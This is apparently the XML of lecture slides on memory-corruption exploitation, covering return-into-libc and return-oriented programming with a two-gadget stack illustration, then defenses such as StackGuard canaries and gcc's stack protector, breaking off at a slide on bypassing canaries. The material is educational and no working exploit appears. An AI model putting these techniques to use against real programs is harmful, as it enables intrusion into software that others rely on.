                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="131" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1211414"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="133" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="134" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="121142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21142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21143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21143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211432"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="143" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect" nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="143"/>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="144" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="121143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1143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21143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21144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211441"/>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211442"/>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211443"/>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21144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99"/>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395" grpId="0" animBg="1"/>
      <p:bldP spid="1211396" grpId="0" animBg="1"/>
      <p:bldP spid="1211397" grpId="0" animBg="1"/>
      <p:bldP spid="1211398" grpId="0" animBg="1"/>
      <p:bldP spid="1211399" grpId="0"/>
      <p:bldP spid="1211400" grpId="0" animBg="1"/>
      <p:bldP spid="1211401" grpId="0" animBg="1"/>
      <p:bldP spid="1211402" grpId="0" animBg="1"/>
      <p:bldP spid="1211403" grpId="0" animBg="1"/>
      <p:bldP spid="1211404" grpId="0" animBg="1"/>
      <p:bldP spid="1211405" grpId="0" animBg="1"/>
      <p:bldP spid="1211406" grpId="0" animBg="1"/>
      <p:bldP spid="1211407" grpId="0" animBg="1"/>
      <p:bldP spid="1211408" grpId="0" animBg="1"/>
      <p:bldP spid="1211409" grpId="0" animBg="1"/>
      <p:bldP spid="1211410" grpId="0" animBg="1"/>
      <p:bldP spid="1211411" grpId="0"/>
      <p:bldP spid="1211412" grpId="0" animBg="1"/>
      <p:bldP spid="1211412" grpId="1" animBg="1"/>
      <p:bldP spid="1211413" grpId="0" animBg="1"/>
      <p:bldP spid="1211414" grpId="0" animBg="1"/>
      <p:bldP spid="1211414" grpId="1" animBg="1"/>
      <p:bldP spid="1211415" grpId="0" animBg="1"/>
      <p:bldP spid="1211416" grpId="0"/>
      <p:bldP spid="1211417" grpId="0" animBg="1"/>
      <p:bldP spid="1211418" grpId="0" animBg="1"/>
      <p:bldP spid="1211419" grpId="0" animBg="1"/>
      <p:bldP spid="1211420" grpId="0" animBg="1"/>
      <p:bldP spid="1211421" grpId="0" animBg="1"/>
      <p:bldP spid="1211422" grpId="0" animBg="1"/>
      <p:bldP spid="1211423" grpId="0" animBg="1"/>
      <p:bldP spid="1211424" grpId="0" animBg="1"/>
      <p:bldP spid="1211425" grpId="0" animBg="1"/>
      <p:bldP spid="1211426" grpId="0" animBg="1"/>
      <p:bldP spid="1211426" grpId="1" animBg="1"/>
      <p:bldP spid="1211428" grpId="0"/>
      <p:bldP spid="1211429" grpId="0" animBg="1"/>
      <p:bldP spid="1211430" grpId="0" animBg="1"/>
      <p:bldP spid="1211431" grpId="0" animBg="1"/>
      <p:bldP spid="1211432" grpId="0" animBg="1"/>
      <p:bldP spid="1211433" grpId="0"/>
      <p:bldP spid="1211438" grpId="0" animBg="1"/>
      <p:bldP spid="1211439" grpId="0" animBg="1"/>
      <p:bldP spid="1211440" grpId="0" animBg="1"/>
      <p:bldP spid="1211441" grpId="0" animBg="1"/>
      <p:bldP spid="1211442" grpId="0" animBg="1"/>
      <p:bldP spid="1211443" grpId="0" animBg="1"/>
      <p:bldP spid="1211444" grpId="0"/>
      <p:bldP spid="67" grpId="0" animBg="1"/>
      <p:bldP spid="67" grpId="1" animBg="1"/>
      <p:bldP spid="68" grpId="0" animBg="1"/>
      <p:bldP spid="69" grpId="0" animBg="1"/>
      <p:bldP spid="69" grpId="1" animBg="1"/>
      <p:bldP spid="70" grpId="0" animBg="1"/>
      <p:bldP spid="71" grpId="0"/>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1" grpId="1" animBg="1"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="83" grpId="0"/>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Return-Oriented Programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> approach can be generalized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead of invoking whole functions, one can invoke just a snippet of code, followed by ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This technique was first introduced in 2005 to work around 64-bit architectures that require parameters to be passed using registers (the “borrowed chunks” technique, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Krahmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>311</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120471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Return-Oriented Programming</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Later, the most general ROP technique was proposed, which supports loops and conditionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From: “The Geometry of Innocent Flesh on the Bone: Return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> without Function Calls (on the x86)”, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hovav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shacham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our thesis: In any sufficiently large body of x86 executable code there will exist sufficiently many useful code sequences that an attacker who controls the stack will be able, by means of the return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> techniques we introduce, to cause the exploited program to undertake arbitrary computation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0C48C68F-D55B-E346-9895-9FEE0C87EFA0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>312</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12043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Gadgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gadget 1 at address X:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gadget 2 at address Y:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The buffer overflow will overwrite the stack as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064983" y="4254413"/>
            <a:ext cx="1817185" cy="36140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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064983" y="4615814"/>
            <a:ext cx="1817185" cy="36140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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064983" y="4977215"/>
            <a:ext cx="1817185" cy="36140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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064983" y="5338616"/>
            <a:ext cx="1817185" cy="36140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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660795" y="5348940"/>
            <a:ext cx="1197764" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Saved EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4305489" y="4357670"/>
            <a:ext cx="10325" cy="123908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450038" y="4262343"/>
            <a:ext cx="1819857" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Higher Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="766376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13" grpId="0"/>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Making Exploitation Harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The next step is preventing the overwrite of the return address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Step 2: Canaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks, USENIX Security 1998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20257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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>StackGuard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184773" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> writes a canary value before the return address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminator canary: NULL(0x00), CR (0x0d), LF (0x0a) and EOF (0xff)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random canary:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> random value stored in location known only to the validation code (and protected with unmapped pages)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XOR canary: random ^ return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During the epilogue the value is verified before performing a ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is achieved by means of a modified function prologue/epilogue (need recompilation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduces overhead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5560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47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47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47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47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47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477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47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Canaries in Linux</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GNU compiler (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) implements a form of stack protection, known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or Stack Smashing Protector (SSP), since version 4.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-protector-all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>combines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>canaries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with a stack layout that minimizes the chances of being exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rearranges memory so that arrays cannot be used to overwrite local variables (e.g., a function pointer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arguments cannot be rearranged, and therefore function pointer arguments are copied into local variables and then the local reference is used within the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Protecting from stack-smashing attacks” by Hiroaki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Etoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kunikazu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Yoda </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16792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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypassing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Canaries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188867" name="Rectangle 3"/>
          <p:cNvSpPr>
